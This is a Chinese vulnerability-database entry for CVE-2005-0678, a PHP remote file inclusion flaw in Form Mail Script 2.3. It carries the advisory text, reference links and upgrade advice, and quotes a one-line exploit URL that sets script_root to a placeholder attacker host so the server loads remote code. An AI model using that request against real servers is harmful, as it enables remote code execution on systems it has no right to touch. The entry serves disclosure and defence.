CVE-2005-0678
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:13:39
NMCOE    

[原文]PHP remote file inclusion vulnerability in formmail.inc.php for Form Mail Script 2.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the script_root to reference a URL on a remote web server that contains the code.


[CNNVD]Form Mail Script PHP远程文件包含漏洞(CNNVD-200505-657)

        用于Form Mail Script 2.3及更早版本的formmail.inc.php存在PHP远程文件包含漏洞,远程攻击者可以通过修改 script_root 来引用一个远程web服务器上含有该代码的URL,从而执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0678
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0678
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-657
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110996489800035&w=2
(UNKNOWN)  BUGTRAQ  20050304 PHP Form Mail Script (2.3) - Arbitrary File Inclusion (VXSfx)
http://securitytracker.com/id?1013378
(UNKNOWN)  SECTRACK  1013378
http://www.stadtaus.com/forum/t-1579.html
(PATCH)  CONFIRM  http://www.stadtaus.com/forum/t-1579.html

- 漏洞信息

Form Mail Script PHP远程文件包含漏洞
高危 未知
2005-05-02 00:00:00 2006-09-28 00:00:00
远程  
        用于Form Mail Script 2.3及更早版本的formmail.inc.php存在PHP远程文件包含漏洞,远程攻击者可以通过修改 script_root 来引用一个远程web服务器上含有该代码的URL,从而执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (857)

PHP Form Mail 2.3 Arbitrary File Inclusion (EDBID:857)
php webapps
2005-03-05 Verified
0 Filip Groszynski
N/A [点击下载]
Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-05]
		

- 漏洞信息

14572
PHP Form Mail formmail.inc.php Script Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-03-04 Unknow
2005-03-04 Unknow

- 解决方案

Upgrade to version 2.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站